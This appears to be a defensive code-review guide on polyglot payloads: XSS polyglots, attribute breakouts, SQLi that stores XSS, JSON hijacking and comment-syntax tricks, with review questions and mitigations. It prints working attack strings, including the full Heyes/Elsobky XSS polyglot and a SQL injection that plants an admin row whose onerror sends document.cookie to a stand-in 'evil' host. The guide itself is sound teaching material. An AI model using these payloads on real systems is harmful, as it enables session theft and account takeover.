Polyglot Payloads Code Review Guide
Table of Contents
What Is a Polyglot Payload?
A polyglot payload is a single byte sequence that is valid input to more than one parser at the same time. The same string parses as HTML and as JavaScript; the same file opens as a PDF and a ZIP; the same config loads as valid YAML and valid JSON. Attackers craft polyglots because modern defences are layered: a WAF looks at one grammar, a server-side encoder at another, a browser at a third, a stored-data consumer at a fourth. A payload that satisfies every grammar gets waved through every layer, and the attacker's code runs wherever the weakest link decides to execute it.
Polyglots are often confused with parser differentials, but the two are structurally opposite. A parser differential is an input where two parsers disagree about the meaning of the same bytes — the attacker hides in the gap between interpretations. A polyglot is an input where every parser agrees the bytes are well-formed — the attacker wins because each parser happily extracts a different meaningful program from the same text. Reviewing for one class sharpens your eye for the other, but the fix patterns are different.
Context-aware encoding is not enough
The standard advice — "use a context-aware encoder: HTML encoder for HTML, JS encoder for JS, URL encoder for URLs" — assumes you know which grammar the output will ultimately be parsed in. Polyglots attack that assumption directly. A payload that is simultaneously a valid HTML attribute, a valid JS string, and a valid CSS value defeats any single-context encoder because the attacker chose the payload knowing which encoder you will use.
One Input, Many Grammars
";!--"<XSS>=&{()}<XSS> — an unknown tag, but a valid one. Attribute state accepts ;!-- as junk.// sibling (-- is fine), and a label.{, then accepts whatever block follows.-- line comment, everything after it ignored until newline.The pattern: a polyglot is a single byte sequence crafted so that every parser in the pipeline accepts it and reads something useful out of it. Unlike a parser differential — where two parsers disagree on meaning — a polyglot succeeds because all parsers agree it is well-formed, each for its own reason.
The diagram above is the fundamental shape: one input, multiple grammar-checkers, each one independently happy. The attacker does not need the checkers to disagree; they need them to all agree that the input is fine, while each also executing a useful fragment of it. The review discipline, as we will see, is to stop relying on grammar-level acceptance as a security signal and start pinning outputs to one grammar at a time — with CSP, with strict Content-Type plus nosniff, with typed parsers that reject ambiguity, and with strong output encoders that know their exact target context.
A reviewer flags a payload that passes WAF, passes the server-side HTML encoder, and yet fires an alert when rendered in the browser. They call it a 'WAF bypass'. What framing is more useful?
Classic XSS Polyglots
The canonical XSS polyglot is the payload by Ahmed Elsobky (@0xSobky), later refined by Gareth Heyes, that fires in every major injection context a web app exposes: HTML body, HTML attribute (single, double, and unquoted), javascript: URL, <script> block, <style>, <title>, <textarea>, and SVG. It is the single most useful piece of test content a reviewer can hand to a new scanner: if it fires on a page, that page is exploitable somewhere.
The Heyes/Elsobky XSS polyglot (annotated)
1jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
2
3# How each segment is engineered:
4# jaVasCript: -> survives href/src/action contexts as a javascript: URL
5# /* ... */ -> JS block comment; ignored by JS, passed by HTML tokenizer
6# ` and \` -> template-literal close to survive backticked string context
7# ' and " -> close single- and double-quoted JS string contexts
8# (/* */oNcliCk=alert() ) -> HTML attribute; mixed case to bypass naive case-sensitive filters
9# //%0D%0A%0d%0a// -> CR/LF terminator for javascript:-URL line comment
10# </stYle/</titLe/</teXtarEa/ -> breaks out of raw-text elements that normally swallow tags
11# </scRipt/--!> -> breaks out of <script> blocks, tolerates HTML --!> quirk
12# \x3csVg/<sVg/oNloAd=alert() -> two SVG vectors; one hex-encoded for attribute contexts
13# //>\x3e -> trailing comment + > to close whatever tag consumed the prefixNotice what makes it a polyglot rather than just a long attack string. Every segment is either (a) valid syntax in the grammar of the context it is targeting, or (b) comment/whitespace in grammars where it is not active. The mixed case (oNcliCk, jaVasCript) is not accidental: HTML attribute names are ASCII-case-insensitive, JS identifiers are case-sensitive. A regex filter written for one grammar misses the payload in the other.
Contexts the polyglot covers
| Context | How it fires | What the filter missed |
|---|---|---|
| HTML body (unescaped) | <code><sVg/oNloAd=alert()></code> lands as an inline SVG event handler. | Filter stripped <code><script></code> but not <code><svg></code>. |
| HTML attribute (double-quoted) | <code>"</code> closes the value; <code>oNcliCk=alert()</code> is a new attribute. | Encoder did not escape the closing quote for the specific quote style in use. |
| HTML attribute (single-quoted) | Same trick with <code>'</code>; mixed-case event name bypasses lowercase deny-lists. | Deny-list of event handlers was case-sensitive. |
| <code>javascript:</code> URL (href, formaction) | Entire string parses as a JS expression — the <code>oNcliCk=</code> is a label plus assignment, <code>alert()</code> runs. | Validator checked the scheme was <code>http(s)</code> <em>by string prefix</em>, so a mixed-case scheme slipped through. |
| Inside <code><script></code> / template literal | Backtick and quote close the surrounding string; the rest executes. | Template literal was built by string concatenation rather than a tagged template. |
| Inside <code><style></code> / <code><title></code> / <code><textarea></code> | The <code></tag></code> sequences break out of raw-text elements. | Output was placed in a raw-text element, where HTML encoding does <em>not</em> help. |
Why one payload instead of seven
A reviewer's instinct is often "I have an encoder for each context, one payload per context is fine." The polyglot exists precisely because the reviewer does not always know which context the output will end up in. Templates get copy-pasted, data gets reused, a field that was a title attribute yesterday becomes a srcdoc tomorrow. A single payload that fires in all contexts is how you find the one context you forgot about.
A scanner reports that the Heyes polyglot fires on a profile page when set as the user's display name. The server-side encoder is HTML-entity-escaping the display name before rendering. Why does the payload still execute?
JS + HTML + Attribute Contexts
The richest polyglot territory is the seam between HTML attribute state and JavaScript. HTML attribute values are parsed by a tokeniser that handles quoting, entity decoding, and state transitions; the value of an event-handler attribute or a javascript: URL is then handed to the JS engine for evaluation. Each grammar has rules the other ignores, and polyglots live in the overlap.
Three Lanes, Three States, Same Bytes
" onfocus=alert(1) autofocus x="- State: attribute-value (double-quoted)
- Reads
"→ ends the current attribute value - Reads
onfocus→ new attribute name - Reads
=alert(1)→ its value - Reads
autofocus→ second boolean attribute
- State: source text
- Never reaches it —
alert(1)never enters a JS context - The string is not parsed as JS at all
- It is executed because the HTML parser promoted it into one
- State: thinks the output is an attribute value
- Escapes
<,>,& - Does not escape the closing
" - Ships the payload unchanged into HTML
The three-lane attribute-breakout payload
1<!-- The template: -->
2<input type="text" value="USER_INPUT">
3
4<!-- USER_INPUT = " onfocus=alert(1) autofocus x=" -->
5
6<!-- After server-side templating: -->
7<input type="text" value="" onfocus=alert(1) autofocus x="">
8
9<!-- What the HTML tokeniser sees:
10 type="text" attribute #1 (unchanged)
11 value="" attribute #2 (closed by injected ")
12 onfocus=alert(1) attribute #3 (new event handler)
13 autofocus attribute #4 (boolean)
14 x="" attribute #5 (trailing garbage, harmless)
15 The <input> now auto-focuses and fires alert(1) on render. -->The injected bytes have not a single HTML-special character the encoder is likely to escape: no <, no >, no &. The only "bad" character is the straight double-quote, and encoders often pass it through untouched when they were written for an HTML-body context (where " has no special meaning). This is how an encoder that is "working correctly" still ships a stored XSS.
Href, src, srcdoc: three sinks, three grammars
1<!-- href: the value is re-parsed as a URL, then again as JS if scheme is javascript: -->
2<a href="USER_INPUT">...</a>
3<!-- USER_INPUT = jaVasCript:alert(1) -->
4<!-- Bypass: scheme check used startswith('http'), missed mixed case -->
5
6<!-- src on an iframe: same re-parse as URL, even stricter CSP context -->
7<iframe src="USER_INPUT"></iframe>
8<!-- USER_INPUT = data:text/html,<script>alert(1)</script> -->
9<!-- Bypass: validator allowlisted "https://" but the encoder did not touch the data: scheme -->
10
11<!-- srcdoc: the ENTIRE attribute value is re-parsed as an HTML document -->
12<iframe srcdoc="USER_INPUT"></iframe>
13<!-- USER_INPUT = <script>alert(1)</script> -->
14<!-- Bypass: HTML entities survive the outer encoder, then the browser DECODES them
15 when it re-parses srcdoc, yielding a live <script> inside the inner document --><code>srcdoc</code> is a double-parse sink
Any attribute whose value is itself a grammar — srcdoc (HTML), style (CSS), href (URL, with optional JS via javascript:) — is a polyglot goldmine. The outer parser (HTML attribute) and the inner parser (the attribute's own grammar) each apply their own escape/decode rules, and attacker bytes can cross the boundary. Treat every such sink as a two-step output and encode for both steps, or better, do not pass user data to them at all.
A diff adds `<iframe srcdoc={userBio}>` to a profile component. The bio field is already HTML-entity-escaped at the boundary. Is this safe?
SQLi + XSS Combined Payloads
A polyglot payload that is simultaneously a valid SQL fragment and a valid HTML snippet lets an attacker turn one injection into two. The classic form is stored XSS delivered through SQL injection: the SQLi inserts attacker-controlled bytes into a database column, and the stored value is later rendered in an admin dashboard or customer-support tool. Because the two injection points are on different pages with different defences, a single polyglot bypasses both.
SQLi payload that stores XSS
1-- The attacker controls the 'search' parameter of a public endpoint.
2-- The server builds a query by string concatenation (the original bug).
3SELECT id, name FROM users
4WHERE name LIKE '%SEARCH%';
5
6-- Attacker input:
7-- %'); INSERT INTO users(name, role) VALUES
8-- ('<img src=x onerror=fetch("//evil/"+document.cookie)>', 'admin'); --
9
10-- The resulting statement (after concat):
11SELECT id, name FROM users
12WHERE name LIKE '%%'); INSERT INTO users(name, role) VALUES
13('<img src=x onerror=fetch("//evil/"+document.cookie)>', 'admin'); --%';
14
15-- Two things happen:
16-- 1. A new admin user is created, whose "name" is an HTML <img> tag.
17-- 2. Nothing on this page renders the name; the SQLi succeeds silently.What the admin sees later
1<!-- On the admin user-management page, the new row is rendered: -->
2<tr>
3 <td>4711</td>
4 <td><img src=x onerror=fetch("//evil/"+document.cookie)></td>
5 <td>admin</td>
6</tr>
7
8<!-- The admin template used {{ user.name | raw }} because it "was trusted server data".
9 The image fails to load, onerror fires, the admin's session cookie is exfiltrated. -->The two injections are often reviewed by different teams. The SQLi reviewer sees a query on a public endpoint and thinks "parameterised query, shrug, fix it next sprint." The XSS reviewer sees an admin-only page and thinks "trusted internal data, skip the encoder." Each is half-right; the polyglot weaves them into a full compromise. The review rule is universal: no data is "trusted" on the read path simply because writes to it were supposed to be validated on a different page.
Double-encoding is not a fix
A common wrong turn: "we will HTML-encode on write and on read, to be safe." That breaks legitimate data (user display names containing &, <) and gives a false sense of security — the right fix is parameterised queries and context-aware output encoding at render time, not string-stuffing the data at rest. Defence in depth is not the same as duplicate encoding.
- SQLi + SSTI: stored Jinja/Twig/ERB tags survive until an admin page renders them through a template engine.
- SQLi + CSV injection: a stored value beginning with
=,+,@, or-becomes an active formula when exported to Excel. - SQLi + log injection: newlines plus fake log lines land in an ELK pipeline that does not sanitise on read.
- SQLi + email injection:
\r\nBcc:headers survive in a stored template and fire the next time a notification is sent. - ORM query fragment + raw SQL polyglot: a string that is a valid ORM filter and a SQL injection for the underlying driver when the ORM falls back to raw.
A reviewer finds a stored value in a users table that reads `<img src=x onerror=...>`. The public endpoint that accepts name updates uses parameterised queries and rejects anything longer than 80 characters. Where did the polyglot come from?
JSON + JS + HTML Ambiguity
JSON was designed as a subset of JavaScript. For a long time that made eval() a tempting parser, and it is still true that any valid JSON is valid JavaScript. The consequence is an entire polyglot family: inputs that are simultaneously valid JSON, valid JS, and — if the response Content-Type is wrong — parseable as HTML by a browser that falls back to sniffing.
JSON that is also executable JavaScript
1// An endpoint returns what the developer thinks is "just data":
2// GET /api/profile -> {"name": "alice", "cb": "notify"}
3//
4// Another page on another origin embeds it via <script src>:
5// <script src="https://victim.example/api/profile"></script>
6//
7// Because the response Content-Type is text/html (wrong), or missing, or the
8// server failed to set X-Content-Type-Options: nosniff, AND because the top-level
9// JSON literal parses as a valid JavaScript expression-statement with side
10// effects via getters, the attacker reads the object contents cross-origin.
11// This is the JSONP-without-consent family ("JSON hijacking").
12//
13// Mitigation has been standard for a decade but still fails in the wild:
14//
15// 1. Always set Content-Type: application/json; charset=utf-8
16// 2. Always set X-Content-Type-Options: nosniff
17// 3. Never begin a JSON response with a top-level array (legacy Firefox/Safari
18// issue) — always wrap in an object
19// 4. For sensitive responses, prefix with )]}', which breaks script-src eval
20// but is stripped by your client-side fetch wrapper
21// 5. Require a custom header or SameSite=Strict cookie on reads
22//
23// Skip any of these and an attacker's page can `new Function(response)` you.The polyglot sharpens when the JSON contains attacker-controlled strings. Consider a profile endpoint whose bio field is user-provided. A response like {"bio": "</script><img onerror=alert(1) src=x>"} is perfectly valid JSON. If a browser sniffs the response as HTML (because Content-Type is text/html or missing and nosniff is absent), the </script><img> turns into a live DOM node. The bytes are a single polyglot: valid JSON and valid HTML.
The full defence in two headers
1HTTP/1.1 200 OK
2Content-Type: application/json; charset=utf-8
3X-Content-Type-Options: nosniff
4Cache-Control: no-store
5
6{"bio":"</script><img onerror=alert(1) src=x>"}
7
8# With both headers:
9# - Modern browsers REFUSE to sniff the response as HTML or as script.
10# - Embedding the URL via <script src> produces a Content-Type blocking error.
11# - Rendering the URL directly in a window shows raw JSON, not executed HTML.
12#
13# Without nosniff:
14# - IE/legacy browsers sniff a small prefix of the body and, if it "looks like"
15# HTML, render it as such.
16# - Even some hardened browsers relaxed sniffing rules for compatibility.
17#
18# Without Content-Type:
19# - Worst case. Every client picks a default based on URL extension, body
20# contents, or cached rules, and attackers have a field day.UTF-7, BOMs, and the charset polyglot
Legacy browsers would auto-detect character encoding from byte patterns. A payload encoded as UTF-7 looks like inert ASCII, but a browser that sniffs UTF-7 reinterprets +ADw-script+AD4- as <script>. BOMs (EF BB BF for UTF-8, FE FF for UTF-16) similarly flip a parser into a different mode. Always set an explicit charset, always set nosniff, and strip BOMs from user-provided input before it ever reaches an output buffer.
An API returns user profile data as JSON with Content-Type: application/json but without X-Content-Type-Options: nosniff. The profile bio is user-provided. What is the attack?
Comment-Syntax Polyglots
Most languages support more than one comment syntax, and the overlaps between languages are striking. A single physical line can be: a C-style line comment (
//) in JavaScript, a shell comment (#) in Python or Bash, a SQL line comment (--), or an HTML comment (<!-- -->). A polyglot exploits these overlaps to include executable code in one grammar while appearing inert in another.Comment tokens across languages
A comment polyglot: valid JS + valid Python + valid Bash
The practical security relevance is config files and CI inputs. A YAML file that is also a shell script (via
#comments and clever YAML folding) can be fed to bothyaml.safe_load()andbashwith two different meanings. A Markdown file that is also HTML (because Markdown passes through HTML) can contain an<img onerror>that renders live when a previewer skips sanitisation. The review rule is: if a file crosses a boundary where its interpreter might change, the file format must be committed at ingestion, not inferred at consumption.Shebang + fallback trick
A favourite is the shebang-polyglot:
#!/bin/shat the top, with the rest of the file structured so thatshfalls through to anexec python3 "$0"line, so the file runs as shell first and hands itself to Python. It is benign when you write it on purpose, and a live bug when an uploaded file with a tolerated#!line lands on a system that inspects file type by extension alone.Your CI pipeline runs a user-supplied config file through yaml.safe_load() and, separately, through a custom 'comment extractor' that collects lines starting with '#' for documentation. What is the subtle polyglot risk?